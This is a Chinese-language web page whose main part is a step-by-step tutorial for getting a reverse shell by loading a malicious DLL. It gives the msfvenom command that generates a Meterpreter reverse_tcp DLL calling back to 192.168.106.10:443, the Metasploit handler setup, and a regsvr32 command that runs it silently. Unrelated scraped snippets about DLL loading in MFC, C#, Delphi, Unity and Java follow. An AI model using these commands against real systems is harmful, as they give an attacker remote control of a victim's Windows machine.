加载dll文件反弹shell

第一步：生成dll文件

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.106.10 LPORT=443 -f dll -o /tmp/reverse_tcp.dll

第二步：启动MSF等待回连

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.106.10
set LPORT 443
run

第三步：加载dll文件

# 建议加上 /s 和 /u 参数
regsvr32.exe /s /u reverse_tcp.dll

成功反弹shell后在进程列表中会出现rundll32.exe进程，如果退出meterpreter会话则进程消失。

原文地址：https://www.cnblogs.com/dgjnszf/p/12317104.html

时间： 2024-10-04 03:45:50

加载dll文件反弹shell的相关文章

MFC程序加载DLL文件时运行到Loadlibray()语句就无法继续下去

我在学习Detour时,为了进行测试,就建立了一个DLL文件和一个MFC工程. 但是我的MFC程序加载DLL文件时运行到Loadlibray("XXX.dll")这条语句就无法继续下去,没有报错,VS2010也没有停止,还是处于编译运行状态. 可是我之前加载的别的DLL文件都可以运行,这应该是很简单的加载DLL文件的过程呀,就想是dll文件的代码错误?或是MFC工程错误?还是Dll工程错误? 于是我就将dll内的代码复制到原来可以运行的DLL文件中发现可以运行,那就是代码没错, 接

EXE加载DLL文件

加载DLL文件 1.在命令提示符中切换到DLL文件所在的路径 2.dumpbin(如果不能使用dumpbin命令,则到VS安装目录下(如:E:\vs2010chi\VC\bin)其中有dumpbin.exe)查找 vcvars32.bat批处理文件并把它拖到打开的命令提示符中 3.之后输入dumpbin 命令就可以使用(注意下次要使用dumpbin命令时还要执行上面的操作,他只对当前窗口有效) 4. 在需要导出的函数前面加上 _declspec(dllexport) 5.输入dumpbi

c# 动态加载dll文件

/// <summary> /// 动态加载DLL /// </summary> /// <param name="lpFileName">DLL路径</param> /// <param name="Namespace">命名空间</param> /// <param name="ClassName">类名</param> /// <param

ie8 不能加载dll的问题解决

请问是在打开IE的时候提示无法加载DLL文件吗? 请尝试重置IE: 1. 关闭所有Internet Explorer窗口. 2. 单击开始,点击运行,输入inetcpl.cpl,按回车. 3. 点击高级选项卡,点击重置,勾选删除个性化设置,点击重置. 4. 点击关闭

内存加载DLL

1.前言目前很多敏感和重要的DLL(Dynamic-link library) 都没有提供静态版本供编译器进行静态连接(.lib文件),即使提供了静态版本也因为兼容性问题导致无法使用,而只提供DLL版本,并且很多专业软件的授权部分的API,都是单独提供一个DLL来完成,而主模块通过调用DLL中的接口来完成授权功能.虽然这些软件一般都采用了加壳和反调试等保护,但是一旦这些功能失去作用,比如脱壳,反反调试,HOOK API或者干脆写一个仿真的授权DLL(模拟授权DLL的所有导出函数接口),然后仿真

Delphi静态加载DLL和动态加载DLL示例

下面以Delphi调用触摸屏动态库xtkutility.dll为例子,说明如何静态加载DLL和动态加载DLL. 直接上代码. 1.静态加载示例 unit Unit1; interface uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, StdCtrls; type TForm1 = class(TForm) btnEnableTouch: TButton; btnDi

Unity3D 5.0版本加载dll报错, 换用4.5 版本可以正确运行与导出(x86版本)

在Unity3D环境下测试UnityWebCore和awesomium等用来在Unity中显示网页的插件时, 发现总是不能加载dll文件. Win64环境, Unity5.0(64bit) 报错内容如下: Failed to load 'Assets/Plugins/awesomium.dll', expected 64 bit architecture (IMAGE_FILE_MACHINE_AMD64), but was IMAGE_FILE_MACHINE_I386. 网上的回答都是说该d

java 加载dll介绍（转）

最近在做的工作要用到本地方法,需要在Java中加载不少动态链接库(以下为方便延用Windows平台下的简写dll,但并不局限于Windows).刚刚把程序跑通,赶紧把一些心得写出来,mark.也希望对大家的类似工作有所帮助首先,应当明确,dll有两类:(1)Java所依赖的dll和,(2)dll所依赖的dll.正是由于第(2)种dll的存在,才导致了java中加载dll的复杂性大大增加,许多说法都是这样的,但我实验的结果却表明似乎没有那么复杂,后面会予以详细阐述. 其次,Java中加载dll的

JVM加载class文件的原理

当Java编译器编译好.class文件之后,我们需要使用JVM来运行这个class文件.那么最开始的工作就是要把字节码从磁盘输入到内存中,这个过程我们叫做[加载 ].加载完成之后,我们就可以进行一系列的运行前准备工作了,比如: 为类静态变量开辟空间,将常量池存放在方法区内存中并实现常量池地址解析,初始化类静态变量等等.这篇文章我们要好好谈谈JVM是如何加载class文件的? 1.JVM加载类的过程当我们使用命令来执行某一个Java程序(比如Test.class)的时候:java T